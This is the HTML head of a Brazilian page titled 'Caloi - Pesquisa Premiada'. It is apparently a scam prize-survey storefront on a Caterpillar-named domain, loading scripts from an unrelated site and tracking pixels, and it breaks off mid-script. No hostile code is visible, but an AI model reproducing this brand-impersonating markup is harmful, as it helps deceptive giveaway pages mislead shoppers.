<!DOCTYPE html><html class="js" lang="pt-BR" dir="ltr" style="--window-height: 900px; --announcement-bar-height: 10px;"><head><script type="text/javascript" async="" src="//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js"></script><script type="text/javascript" async="" src="//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js"></script><script async="" src="js/fbevents.js"></script><script async="" src="https://www.clarity.ms/tag/nyorlpsbbg"></script><script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "nyorlpsbbg");
</script>
	<title>Caloi - Pesquisa Premiada</title>
	<link rel="icon" href="images/favicon.png" type="image/x-icon">
	<link rel="stylesheet" href="css/style.css">
	<link rel="stylesheet" href="https://sofapremiado.com/inicio/css/footer.css">
	<link rel="stylesheet" href="css/theme.min.css">
	<script type="text/javascript" async="" src="//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js"></script><script type="text/javascript" async="" src="//caterpillar-brindes.com/cdn/s/trekkie.storefront.6feac1db1e2c7d84269967dcaefdee0618af51f6.min.js"></script><script>
		var sizeChartsRelentless = window.sizeChartsRelentless || {};
		sizeChartsRelentless.product = null;
	</script>
	<link rel="stylesheet" href="css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, height=device-height, minimum-scale=1.0, maximum-scale=5.0">
	<meta name="theme-color" content="#ffffff">
	<script src="https://sofapremiado.com/js/k7f2m9at.js" async=""></script>
	<link rel="canonical" href="https://caterpillar-brindes.com/pages/caterpillar">
	<link rel="preconnect" href="https://cdn.shopify.com">
	<link rel="dns-prefetch" href="https://productreviews.shopifycdn.com">
	<link rel="dns-prefetch" href="https://www.google-analytics.com">
	<link rel="preconnect" href="https://fonts.shopifycdn.com" crossorigin="">
	<link rel="preload" as="style" href="https://caterpillar-brindes.com/cdn/shop/t/4/assets/theme.min.css?v=144405040628939568011718812876">
	<link rel="preload" as="script" href="https://caterpillar-brindes.com/cdn/shop/t/4/assets/vendor.js?v=162644391628613446311718812876" defer="">
	<link rel="preload" as="script" href="https://caterpillar-brindes.com/cdn/shop/t/4/assets/theme.min.js?v=152940201276689373991718812876" defer="">
	<meta property="og:type" content="website">
	<meta property="og:title" content="Caterpillar">
	<meta property="og:url" content="https://caterpillar-brindes.com/pages/caterpillar">
	<meta property="og:site_name" content="Cat Promoções">
	<meta name="twitter:card" content="summary">
	<meta name="twitter:title" content="Caterpillar">
	<meta name="twitter:description" content="Caterpillar">
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '8135618449852590');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=8135618449852590&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->

<script async="" defer="" src="js/pixel.js"></script>
  	<script src="js/latest.js" async="" defer=""></script>
	<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    "@type": "BreadcrumbList",
  "itemListElement": [{
      "@type": "ListItem",
      "position": 1,
      "name": "Página Inicial",
      "item": "https://caterpillar-brindes.com"
    },{
          "@type": "ListItem",
          "position": 2,
          "name": "Caterpillar",
          "item": "https://caterpillar-brindes.com/pages/caterpillar"
        }]
  }
  </script>
	<link rel="preload" href="https://caterpillar-brindes.com/cdn/fonts/archivo/archivo_n6.1c7c5a103e7ce5904146bdc8185bb04724ca217a.woff2?h1=NTBkMWFjLTgzLmFjY291bnQubXlzaG9waWZ5LmNvbQ&amp;h2=Y2F0ZXJwaWxsYXItYnJhc2lsLW9maWNpYWwubXlzaG9waWZ5LmNvbQ&amp;h3=Y2F0ZXJwaWxsYXItYnJpbmRlcy5jb20&amp;hmac=6a33b4210bbe3e40ca23c48fc03b36a20ccf68918cbf40a999f7294b2bbe84f8" as="font" type="font/woff2" crossorigin="">
	<link rel="preload" href="https://caterpillar-brindes.com/cdn/fonts/poppins/poppins_n4.934accbf9f5987aa89334210e6c1e9151f37d3b6.woff2?h1=NTBkMWFjLTgzLmFjY291bnQubXlzaG9waWZ5LmNvbQ&amp;h2=Y2F0ZXJwaWxsYXItYnJhc2lsLW9maWNpYWwubXlzaG9waWZ5LmNvbQ&amp;h3=Y2F0ZXJwaWxsYXItYnJpbmRlcy5jb20&amp;hmac=8bf0dad68be5c9cf90d70e993e80b96d463865a0a26c6dd2246d8ca35760d7b8" as="font" type="font/woff2" crossorigin="">
	<style>
		/* Typography (heading) */
		@font-face {
			font-family: Archivo;
			font-weight: 600;
			font-style: normal;
			font-display: swap;
			src: url("fonts/archivo_n6.1c7c5a103e7ce5904146bdc8185bb04724ca217a.woff2") format("woff2"),
				url("fonts/archivo_n6.73bf910681d1d187dcf6155c4f8a2c6fe79ac7be.woff") format("woff");
		}
		@font-face {
			font-family: Archivo;
			font-weight: 600;
			font-style: italic;
			font-display: swap;
			src: url("fonts/archivo_i6.243682eac95afbeca7583f60c388b9a35a735280.woff2") format("woff2"),
				url("fonts/archivo_i6.502cd191c9502df39e7033e0cdf815ae5008ab20.woff") format("woff");
		}
		/* Typography (body) */
		@font-face {
			font-family: Poppins;
			font-weight: 400;
			font-style: normal;
			font-display: swap;
			src: url("fonts/poppins_n4.934accbf9f5987aa89334210e6c1e9151f37d3b6.woff2") format("woff2"),
				url("fonts/poppins_n4.ee28d4489eaf5de9cf6e17e696991b5e9148c716.woff") format("woff");
		}
		@font-face {
			font-family: Poppins;
			font-weight: 400;
			font-style: italic;
			font-display: swap;
			src: url("fonts/poppins_i4.a7e8d886e15d5fb9bc964a53b3278effbf270e9c.woff2") format("woff2"),
				url("fonts/poppins_i4.e87de252199e27825a41bf81646996685d86452d.woff") format("woff");
		}
		@font-face {
			font-family: Poppins;
			font-weight: 600;
			font-style: normal;
			font-display: swap;
			src: url("fonts/poppins_n6.e2fdd168541a5add2d1a8d6f2b89b09c9c9e690d.woff2") format("woff2"),
				url("fonts/poppins_n6.6d62d2d0f11a9ff578d200ad2154f9860db165c1.woff") format("woff");
		}
		@font-face {
			font-family: Poppins;
			font-weight: 600;
			font-style: italic;
			font-display: swap;
			src: url("fonts/poppins_i6.672e5321078e70c7e1abdba4d92995c37fb35eae.woff2") format("woff2"),
				url("fonts/poppins_i6.b932b853e07d22eecd5ccfe6f9e0137b21b64d5b.woff") format("woff");
		}
		:root {
			--frete-buscar-btn: #000000;
			--frete-buscar-fonte: #fff;
			--frete-buscar-localizacao: #36b376;
			--frete-buscar-precos: #36b376;
			--box-primaria: #ffffff;
			--box-sec: #8f8f8f;
			--box-titulo: #101010;
			--bandeiras-w-mobile: 13%;
			--bandeiras-w-desktop: 10%;
			--bandeiras-t-fonte: 10px;
			--bandeiras-w-mobilec: 14%;
			--bandeiras-w-desktopc: 14%;
			--bandeiras-t-fontec: 12px;
			--logo-correcao-m: -6px;
			--logo-correcao-d: -9px;
			--arredonda-box: 2px;
			--color-parcel-prod: #000000;
			--preco-prod: 27px;
			--preco-prodm: 29px;
			--borda-descont-pro: 4px;
			--desconto-fonte-label: 12px;
			--footer-backg: #ffffff;
			--pix-envio-bordageral: 7px;
			--pix-envio-bordaenvio: 15px;
			--pix-envio-tfonte: 13px;
			--pix-envio-tsimb: 18px;
			--logo-ps-m: 0px;
			--logo-pi-m: 0px;
			--logo-ps-d: 0px;
			--logo-pi-d: 0px;
			--anuncio-alturam: 38px;
			--anuncio-alturad: 30px;
			--anuncio-fontem: 14px;
			--anuncio-fonted: 15px;
			--pix-envio-fundo: #f1f1f1;
			--pix-envio-textdesc: #201F1F;
			--pix-envio-textnopix: #5E5E5E;
			--pix-envio-simb: #36b376;
			--pix-envio-enviofundo: #36b376;
			--pix-envio-enviotexto: #fff;
			--product-truck-background: #000000;
			--color-frete-fundo: #fff;
			--product-truck-color: #fff;
			--product-free-shipping-color: #000;
			--product-localization-color: #5E5E5E;
			--product-icon-return-color: ;
			--product-return-color: ;
			--popup_button_right: px;
			--popup_size-color: #2b3948;
			--popup_text_medidas-color: #ffffff;
			--popup_border: 7px;
			--popup_show-color: #ffffff;
			--popup_text-color: #000;
			--icon_popup_image: :;
			--popup_text_titulo: : #000;
			--alt-bot-qnt: 49px;
			--borda-bot-qnt: 5px;
			--borda-atv-parcelamento: 4px;
			--borda-atv-parcelamento2: #dfdfdf;
			--fonte-wht: 15px;
			--fonte1m-colecao: 24px;
			--fonte1d-colecao: 30px;
			--selito-lar: 40px;
			--selito-larm: 42px;
			--fonte2m-colecao: 26px;
			--fonte2d-colecao: 30px;
			--color-bolinha-b: #f7be00;
			--color-bolinha-f: #000;
			--social-radius: 4px;
			--social-mard: 2px;
			--social-mari: 2px;
			--social-bord-cor: #dedede;
			--social-icon-cor: #0e0e0e;
			--social-icon-back: #ffffff;
			--continuar-fundo: #fff;
			--continuar-texto: #000;
			--continuar-borda: #000;
			--cookie-fontegeral: #000;
			--cookie-fundogeral: #ededed;
			--cookie-aceitarfundo: #008026;
			--cookie-aceitarfonte: #fff;
			--cookie-recusarfundo: #fa0000;
			--cookie-recusarfonte: #fff;
			--cookie-fonte: 14px;
			--color-primary-parcelamento: #1d1d1d;
			--color-secondary-parcelamento: #565c69;
			--color-terciary-parcelamento: #b6bbc2;
			--color-active-parcelamento: var(--color-terciary-parcelamento);
			--color-quart-parcelamento: #ffffff;
			--color-quint-parcelamento: #000000;
			--wpp_cor1: #36b376;
			--wpp_cor2: #ffffff;
			--wpp_cor3: #36b376;
			--wpp_cor4: #ffffff;
			--wpp_cor5: #36b376;
			--wpp_spc: 0.2pt;
			--label-desconto: #f7be00;
			--fonte-desconto: #000000;
			--back-vendidos: #f5f5f5;
			--fonte-vendidos: #a7a5a5;
			--back-exclusivo: #f7be00;
			--fonte-exclusivo: #000000;
			--back-exclusivo2: #000;
			--fonte-exclusivo2: #FFF;
			--color-primary-whatsapp: #36b376;
			--color-secundary-whatsapp: #ffffff;
			--color-terciary-whatsapp: #fefefe;
			--color-accent-whatsapp: #fff;
			--colorp-progress: #f1f1f1;
			--colors-progress: #e2a696;
			--alt-progress: 8px;
			--font-progress: 12px;
			--heading-color: 40, 40, 40;
			--text-color: 40, 40, 40;
			--background: 255, 255, 255;
			--secondary-background: 245, 245, 245;
			--border-color: 223, 223, 223;
			--border-color-darker: 169, 169, 169;
			--success-color: 46, 158, 123;
			--success-background: 213, 236, 229;
			--error-color: 222, 42, 42;
			--error-background: 253, 240, 240;
			--primary-button-background: 247, 190, 0;
			--primary-button-text-color: 0, 0, 0;
			--secondary-button-background: 0, 0, 0;
			--secondary-button-text-color: 255, 255, 255;
			--product-star-rating: 246, 164, 41;
			--product-on-sale-accent: 51, 51, 51;
			--product-sold-out-accent: 111, 113, 155;
			--product-custom-label-background: 19, 19, 19;
			--product-custom-label-text-color: 255, 255, 255;
			--product-custom-label-2-background: 243, 255, 52;
			--product-custom-label-2-text-color: 0, 0, 0;
			--product-low-stock-text-color: 222, 42, 42;
			--product-in-stock-text-color: 46, 158, 123;
			--loading-bar-background: 40, 40, 40;
			/* We duplicate some "base" colors as root colors, which is useful to use on drawer elements or popover without. Those should not be overridden to avoid issues */
			--root-heading-color: 40, 40, 40;
			--root-text-color: 40, 40, 40;
			--root-background: 255, 255, 255;
			--root-border-color: 223, 223, 223;
			--root-primary-button-background: 247, 190, 0;
			--root-primary-button-text-color: 0, 0, 0;
			--base-font-size: 17px;
			--heading-font-family: Archivo, serif;
			--heading-font-weight: 600;
			--heading-font-style: normal;
			--heading-text-transform: normal;
			--text-font-family: Poppins, sans-serif;
			--text-font-weight: 400;
			--text-font-style: normal;
			--text-font-bold-weight: 600;
			/* Typography (font size) */
			--heading-xxsmall-font-size: 11px;
			--heading-xsmall-font-size: 11px;
			--heading-small-font-size: 13px;
			--heading-large-font-size: 40px;
			--heading-h1-font-size: 40px;
			--heading-h2-font-size: 32px;
			--heading-h3-font-size: 28px;
			--heading-h4-font-size: 26px;
			--heading-h5-font-size: 22px;
			--heading-h6-font-size: 18px;
			/* Control the look and feel of the theme by changing radius of various elements */
			--button-border-radius: 4px;
			--block-border-radius: 16px;
			--block-border-radius-reduced: 8px;
			--color-swatch-border-radius: 100%;
			/* Button size */
			--button-height: 48px;
			--button-small-height: 40px;
			/* Form related */
			--form-input-field-height: 48px;
			--form-input-gap: 16px;
			--form-submit-margin: 24px;
			/* Product listing related variables */
			--product-list-block-spacing: 32px;
			/* Video related */
			--play-button-background: 255, 255, 255;
			--play-button-arrow: 40, 40, 40;
			/* RTL support */
			--transform-logical-flip: 1;
			--transform-origin-start: left;
			--transform-origin-end: right;
			/* Other */
			--zoom-cursor-svg-url: url(images/zoom-cursor.svg);
			--arrow-right-svg-url: url(images/arrow-right.svg);
			--arrow-left-svg-url: url(images/arrow-left.svg);
			/* Some useful variables that we can reuse in our CSS. Some explanation are needed for some of them:
       - container-max-width-minus-gutters: represents the container max width without the edge gutters
       - container-outer-width: considering the screen width, represent all the space outside the container
       - container-outer-margin: same as container-outer-width but get set to 0 inside a container
       - container-inner-width: the effective space inside the container (minus gutters)
       - grid-column-width: represents the width of a single column of the grid
       - vertical-breather: this is a variable that defines the global "spacing" between sections, and inside the section
                            to create some "breath" and minimum spacing
     */
			--container-max-width: 1600px;
			--container-gutter: 24px;
			--container-max-width-minus-gutters: calc(var(--container-max-width) - (var(--container-gutter)) * 2);
			--container-outer-width: max(calc((100vw - var(--container-max-width-minus-gutters)) / 2), var(--container-gutter));
			--container-outer-margin: var(--container-outer-width);
			--container-inner-width: calc(100vw - var(--container-outer-width) * 2);
			--grid-column-count: 10;
			--grid-gap: 24px;
			--grid-column-width: calc((100vw - var(--container-outer-width) * 2 - var(--grid-gap) * (var(--grid-column-count) - 1)) / var(--grid-column-count));
			--vertical-breather: 28px;
			--vertical-breather-tight: 28px;
			/* Shopify related variables */
			--payment-terms-background-color: #ffffff;
		}
		@media screen and (min-width: 741px) {
			:root {
				--container-gutter: 40px;
				--grid-column-count: 20;
				--vertical-breather: 40px;
				--vertical-breather-tight: 40px;
				/* Typography (font size) */
				--heading-xsmall-font-size: 13px;
				--heading-small-font-size: 14px;
				--heading-large-font-size: 58px;
				--heading-h1-font-size: 58px;
				--heading-h2-font-size: 44px;
				--heading-h3-font-size: 36px;
				--heading-h4-font-size: 28px;
				--heading-h5-font-size: 22px;
				--heading-h6-font-size: 20px;
				/* Form related */
				--form-input-field-height: 52px;
				--form-submit-margin: 32px;
				/* Button size */
				--button-height: 52px;
				--button-small-height: 44px;
			}
		}
		@media screen and (min-width: 1200px) {
			:root {
				--vertical-breather: 48px;
				--vertical-breather-tight: 48px;
				--product-list-block-spacing: 48px;

				/* Typography */
				--heading-large-font-size: 72px;
				--heading-h1-font-size: 62px;
				--heading-h2-font-size: 54px;
				--heading-h3-font-size: 40px;
				--heading-h4-font-size: 34px;
				--heading-h5-font-size: 26px;
				--heading-h6-font-size: 18px;
			}
		}
		@media screen and (min-width: 1600px) {
			:root {
				--vertical-breather: 48px;
				--vertical-breather-tight: 48px;
			}
		}
	</style>
	<script>
		// This allows to expose several variables to the global scope, to be used in scripts
		window.themeVariables = {
			settings: {
				direction: "ltr",
				pageType: "page",
				cartCount: 0,
				moneyFormat: "R$ {{amount_with_comma_separator}}",
				moneyWithCurrencyFormat: "R$ {{amount_with_comma_separator}} BRL",
				showVendor: false,
				discountMode: "percentage",
				currencyCodeEnabled: false,
				searchMode: "product,article,collection",
				searchUnavailableProducts: "last",
				cartType: "page",
				cartCurrency: "BRL",
				mobileZoomFactor: 2.5
			},
			routes: {
				host: "caterpillar-brindes.com",
				rootUrl: "\/",
				rootUrlWithoutSlash: '',
				cartUrl: "\/cart",
				cartAddUrl: "\/cart\/add",
				cartChangeUrl: "\/cart\/change",
				searchUrl: "\/search",
				predictiveSearchUrl: "\/search\/suggest",
				productRecommendationsUrl: "\/recommendations\/products"
			},
			strings: {
				accessibilityDelete: "Deletar",
				accessibilityClose: "Fechar",
				collectionSoldOut: "Esgotado",
				collectionDiscount: "- @savings@",
				productSalePrice: "Preço promocional",
				productRegularPrice: "Preço normal",
				productFormUnavailable: "Indisponível",
				productFormSoldOut: "Esgotado",
				productFormPreOrder: "Pré-compra",
				productFormAddToCart: "RESGATAR AGORA",
				searchNoResults: "Nenhum resultado foi encontrado.",
				searchNewSearch: "Nova pesquisa",
				searchProducts: "Produtos",
				searchArticles: "Blog",
				searchPages: "Páginas",
				searchCollections: "Coleções",
				cartViewCart: "Ver carrinho",
				cartItemAdded: "Item adicionado ao carrinho!",
				cartItemAddedShort: "Adicionado ao carrinho!",
				cartAddOrderNote: "Adicionar observações",
				cartEditOrderNote: "Editar observações",
				shippingEstimatorNoResults: "Desculpe, não enviamos para seu endereço.",
				shippingEstimatorOneResult: "Temos uma opção de frete para seu endereço:",
				shippingEstimatorMultipleResults: "Temos diversas opções de frete para o seu endereço:",
				shippingEstimatorError: "Um ou mais erros ocorreram ao calcular o frete:"
			},
			libs: {
				flickity: "\/\/caterpillar-brindes.com\/cdn\/shop\/t\/4\/assets\/flickity.js?v=4101124369061427901718812875",
				photoswipe: "\/\/caterpillar-brindes.com\/cdn\/shop\/t\/4\/assets\/photoswipe.js?v=132268647426145925301718812875",
				qrCode: "\/\/caterpillar-brindes.com\/cdn\/shopifycloud\/shopify\/assets\/themes_support\/vendor\/qrcode-83ced323738e20d8fa253cebfacec51a3ad103d8bfeb275d3d312d29490f9265.js"
			},
			breakpoints: {
				phone: 'screen and (max-width: 740px)',
				tablet: 'screen and (min-width: 741px) and (max-width: 999px)',
				tabletAndUp: 'screen and (min-width: 741px)',
				pocket: 'screen and (max-width: 999px)',
				lap: 'screen and (min-width: 1000px) and (max-width: 1199px)',
				lapAndUp: 'screen and (min-width: 1000px)',
				desktop: 'screen and (min-width: 1200px)',
				wide: 'screen and (min-width: 1400px)'
			}
		};
		window.addEventListener('pageshow', async () => {
			const cartContent = await (await fetch(`${window.themeVariables.routes.cartUrl}.js`, { cache: 'reload' })).json();
			document.documentElement.dispatchEvent(new CustomEvent('cart:refresh', { detail: { cart: cartContent } }));
		});
		if ('noModule' in HTMLScriptElement.prototype) {
			// Old browsers (like IE) that does not support module will be considered as if not executing JS at all
			document.documentElement.className = document.documentElement.className.replace('no-js', 'js');
			requestAnimationFrame(() => {
				const viewportHeight = (window.visualViewport ? window.visualViewport.height : document.documentElement.clientHeight);
				document.documentElement.style.setProperty('--window-height', viewportHeight + 'px');
			});
		}</script>
	<link rel="stylesheet" href="https://sofapremiado.com/css/theme.min.css">
	<link rel="stylesheet" href="css/all.min_2.css" crossorigin="anonymous" referrerpolicy="no-referrer">
	<script src="js/vendor.js" defer=""></script>
	<script src="js/theme.min.js" defer=""></script>
	<script src="js/custom.js" defer=""></script>
	<script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.start');</script>
	<meta id="shopify-digital-wallet" name="shopify-digital-wallet" content="/65410498752/digital_wallets/dialog">
	<meta name="shopify-checkout-api-token" content="62867483e71645e5eac3785ea60cb766">
	<meta id="in-context-paypal-metadata" data-shop-id="65410498752" data-venmo-supported="false" data-environment="production" data-locale="pt_BR" data-paypal-v4="true" data-currency="BRL">
	<script async="async" src="js/preloads.js"></script>
	<script async="async" src="js/preloads_1.js" crossorigin="anonymous"></script>
	<script id="shopify-features" type="application/json">{"accessToken":"62867483e71645e5eac3785ea60cb766","betas":["rich-media-storefront-analytics"],"domain":"caterpillar-brindes.com","predictiveSearch":true,"shopId":65410498752,"smart_payment_buttons_url":"https:\/\/caterpillar-brindes.com\/cdn\/shopifycloud\/payment-sheet\/assets\/latest\/spb.pt-br.js","dynamic_checkout_cart_url":"https:\/\/caterpillar-brindes.com\/cdn\/shopifycloud\/payment-sheet\/assets\/latest\/dynamic-checkout-cart.pt-br.js","locale":"pt-br"}</script>
	<script>var Shopify = Shopify || {};
		Shopify.shop = "50d1ac-83.myshopify.com";
		Shopify.locale = "pt-BR";
		Shopify.currency = { "active": "BRL", "rate": "1.0" };
		Shopify.country = "BR";
		Shopify.theme = { "name": "sabino-v5-nichado-2", "id": 136609956032, "theme_store_id": null, "role": "main" };
		Shopify.theme.handle = "null";
		Shopify.theme.style = { "id": null, "handle": null };
		Shopify.cdnHost = "caterpillar-brindes.com/cdn";
		Shopify.routes = Shopify.routes || {};
		Shopify.routes.root = "/";</script>
	<script type="module">!function (o) { (o.Shopify = o.Shopify || {}).modules = !0 }(window);</script>
	<script>!function (o) { function n() { var o = []; function n() { o.push(Array.prototype.slice.apply(arguments)) } return n.q = o, n } var t = o.Shopify = o.Shopify || {}; t.loadFeatures = n(), t.autoloadFeatures = n() }(window);</script>
	<script id="shop-js-features" type="application/json">{"compact":true,"defer_modal_on_autofill":true}</script>
	<script id="shop-js-analytics" type="application/json">{"pageType":"page"}</script>
	<script id="__st">var __st = { "a": 65410498752, "offset": -10800, "reqid": "b19c3597-06c3-4daf-aa54-2f3b0d19c82f-1719529843", "pageurl": "caterpillar-brindes.com\/pages\/caterpillar", "s": "pages-97989558464", "u": "6b52b70211ae", "p": "page", "rtyp": "page", "rid": 97989558464 };</script>
	<script>window.ShopifyPaypalV4VisibilityTracking = true;</script>
	<script id="captcha-bootstrap">!function () { 'use strict'; const e = 'contact', t = 'account', n = 'new_comment', o = e => e.map((([e, t]) => `form[action*='/${e}'] input[name='form_type'][value='${t}']`)).join(','); function c(e, t) { try { const n = window.sessionStorage; for (const [o, c] of Object.entries(JSON.parse(n.getItem(t)))) e.elements[o] && (e.elements[o].value = c); n.removeItem(t) } catch { } } const r = 'form_type', s = 'cptcha'; function a(e) { e.dataset[s] = !0 } ((i, m, f, u, d, l, p) => { if (0) return; let E = !1; const _ = (e, t, n) => { const o = i[f][u], c = o.bindForm, r = '6LeHG2ApAAAAAO4rPaDW-qVpPKPOBfjbCpzJB9ey', s = { infoText: '', privacyText: '', termsText: '' }; if (c) return c(e, r, t, s).then(n); o.q.push([[e, r, t, s], n]), E || (m.body.append(Object.assign(m.createElement('script'), { id: 'captcha-provider', async: !0, src: 'https://cdn.shopify.com/shopifycloud/storefront-forms-hcaptcha/ce_storefront_forms_captcha_recaptcha.v1.2.0.iife.js' })), E = !0) }; i[f] = i[f] || {}, i[f][u] = i[f][u] || {}, i[f][u].q = [], i[f][d] = i[f][d] || {}, i[f][d].protect = function (e, t) { _(e, void 0, t), a(e) }, Object.freeze(i[f][d]), function (i, m, f, u, d, l) { const [p, E, _] = function (c, r, s) { const a = r ? [[e, e], ['blogs', n], ['comments', n], [e, 'customer']] : [], i = c ? [[t, 'customer_login'], [t, 'guest_login'], [t, 'recover_customer_password'], [t, 'create_customer']] : [], m = [...a, ...i], f = o(m), u = o(a.slice(0, 3)), d = s && o(m.filter((([e, t]) => s.includes(t)))), l = e => () => e ? [...document.querySelectorAll(e)].map((e => e.form)) : []; return [l(f), l(u), l(d)] }(!0, !0, ['guest_login']), T = e => { const t = e.target, n = t instanceof HTMLFormElement ? t : t && t.form; return n && p().find((e => n === e)) }; i.addEventListener('submit', (e => { T(e) && e.preventDefault() })); const h = (e, t) => { e && !e.dataset[s] && (f(e, t.some((t => t === e))), a(e)) }; for (const e of ['focusin', 'change']) i.addEventListener(e, (e => h(T(e), E()))); const v = m.get('form_key'), g = m.get(r), y = v && g; i.addEventListener('DOMContentLoaded', (() => { const e = E(); if (y) for (const t of e) t.elements[r].value === g && c(t, v);[...new Set([..._(), ...p().filter((e => 'true' === e.dataset.shopifyCaptcha))])].forEach((t => h(t, e))) })) }(m, new URLSearchParams(i.location.search), _) })(window, document, 'Shopify', 'ce_forms', 'captcha') }();</script>
	<script data-source-attribution="shopify.loadfeatures" defer="defer" src="js/load_feature-9f951eb7d8d53973c719de211f807d63af81c644e5b9a6ae72661ac408d472f6.js" crossorigin="anonymous"></script>
	<script data-source-attribution="shopify.dynamic-checkout" defer="defer" src="js/features-1c0b396bd4d054b94abae1eb6a1bd6ba47beb35525c57a217c77a862ff06d83f.js" crossorigin="anonymous"></script>
	<style id="shopify-dynamic-checkout-cart">
		@media screen and (min-width: 750px) {
			#dynamic-checkout-cart {
				min-height: 50px;
			}
		}

		@media screen and (max-width: 750px) {
			#dynamic-checkout-cart {
				min-height: 60px;
			}
		}
	</style>
	<script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.end');</script>
	<script>window.performance && window.performance.mark && window.performance.mark('shopify.content_for_header.start');</script>
	<meta id="shopify-digital-wallet" name="shopify-digital-wallet" content="/65410498752/digital_wallets/dialog">
	<meta name="shopify-checkout-api-token" content="62867483e71645e5eac3785ea60cb766">
	<meta id="in-context-paypal-metadata" data-shop-id="65410498752" data-venmo-supported="false" data-environment="production" data-locale="pt_BR" data-paypal-v4="true" data-currency="BRL">
	<script async="async" data-src="/checkouts/internal/preloads.js?locale=pt-BR"></script>
	<script async="async" data-src="https://shop.app/checkouts/internal/preloads.js?locale=pt-BR&amp;shop_id=65410498752" crossorigin="anonymous"></script>
	<script id="shopify-features" type="application/json">{"accessToken":"62867483e71645e5eac3785ea60cb766","betas":["rich-media-storefront-analytics"],"domain":"caterpillar-brindes.com","predictiveSearch":true,"shopId":65410498752,"smart_payment_buttons_url":"https:\/\/caterpillar-brindes.com\/cdn\/shopifycloud\/payment-sheet\/assets\/latest\/spb.pt-br.js","dynamic_checkout_cart_url":"https:\/\/caterpillar-brindes.com\/cdn\/shopifycloud\/payment-sheet\/assets\/latest\/dynamic-checkout-cart.pt-br.js","locale":"pt-br"}</script>
	<script>var Shopify = Shopify || {};
		Shopify.shop = "50d1ac-83.myshopify.com";
		Shopify.locale = "pt-BR";
		Shopify.currency = { "active": "BRL", "rate": "1.0" };
		Shopify.country = "BR";
		Shopify.theme = { "name": "sabino-v5-nichado-2", "id": 136609956032, "theme_store_id": null, "role": "main" };
		Shopify.theme.handle = "null";
		Shopify.theme.style = { "id": null, "handle": null };
		Shopify.cdnHost = "caterpillar-brindes.com/cdn";
		Shopify.routes = Shopify.routes || {};
		Shopify.routes.root = "/";</script>
	<script type="module">!function (o) { (o.Shopify = o.Shopify || {}).modules = !0 }(window);</script>
	<script>!function (o) { function n() { var o = []; function n() { o.push(Array.prototype.slice.apply(arguments)) } return n.q = o, n } var t = o.Shopify = o.Shopify || {}; t.loadFeatures = n(), t.autoloadFeatures = n() }(window);</script>
	<script id="shop-js-features" type="application/json">{"compact":true,"defer_modal_on_autofill":true}</script>
	<script id="shop-js-analytics" type="application/json">{"pageType":"page"}</script>
	<script id="__st">var __st = { "a": 65410498752, "offset": -10800, "reqid": "b19c3597-06c3-4daf-aa54-2f3b0d19c82f-1719529843", "pageurl": "caterpillar-brindes.com\/pages\/caterpillar", "s": "pages-97989558464", "u": "6b52b70211ae", "p": "page", "rtyp": "page", "rid": 97989558464 };</script>
	<script>window.ShopifyPaypalV4VisibilityTracking = true;</script>
	<script id="captcha-bootstrap">!function () { 'use strict'; const e = 'contact', t = 'account', n = 'new_comment', o = e => e.map((([e, t]) => `form[action*='/${e}'] input[name='form_type'][value='${t}']`)).join(','); function c(e, t) { try { const n = window.sessionStorage; for (const [o, c] of Object.entries(JSON.parse(n.getItem(t)))) e.elements[o] && (e.elements[o].value = c); n.removeItem(t) } catch { } } const r = 'form_type', s = 'cptcha'; function a(e) { e.dataset[s] = !0 } ((i, m, f, u, d, l, p) => { if (0) return; let E = !1; const _ = (e, t, n) => { const o = i[f][u], c = o.bindForm, r = '6LeHG2ApAAAAAO4rPaDW-qVpPKPOBfjbCpzJB9ey', s = { infoText: '', privacyText: '', termsText: '' }; if (c) return c(e, r, t, s).then(n); o.q.push([[e, r, t, s], n]), E || (m.body.append(Object.assign(m.createElement('script'), { id: 'captcha-provider', async: !0, src: 'https://cdn.shopify.com/shopifycloud/storefront-forms-hcaptcha/ce_storefront_forms_captcha_recaptcha.v1.2.0.iife.js' })), E = !0) }; i[f] = i[f] || {}, i[f][u] = i[f][u] || {}, i[f][u].q = [], i[f][d] = i[f][d] || {}, i[f][d].protect = function (e, t) { _(e, void 0, t), a(e) }, Object.freeze(i[f][d]), function (i, m, f, u, d, l) { const [p, E, _] = function (c, r, s) { const a = r ? [[e, e], ['blogs', n], ['comments', n], [e, 'customer']] : [], i = c ? [[t, 'customer_login'], [t, 'guest_login'], [t, 'recover_customer_password'], [t, 'create_customer']] : [], m = [...a, ...i], f = o(m), u = o(a.slice(0, 3)), d = s && o(m.filter((([e, t]) => s.includes(t)))), l = e => () => e ? [...document.querySelectorAll(e)].map((e => e.form)) : []; return [l(f), l(u), l(d)] }(!0, !0, ['guest_login']), T = e => { const t = e.target, n = t instanceof HTMLFormElement ? t : t && t.form; return n && p().find((e => n === e)) }; i.addEventListener('submit', (e => { T(e) && e.preventDefault() })); const h = (e, t) => { e && !e.dataset[s] && (f(e, t.some((t => t === e))), a(e)) }; for (const e of ['focusin', 'change']) i.addEventListener(e, (e => h(T(e), E()))); const v = m.get('form_key'), g = m.get(r), y = v && g; i.addEventListener('DOMContentLoaded', (() => { const e = E(); if (y) for (const t 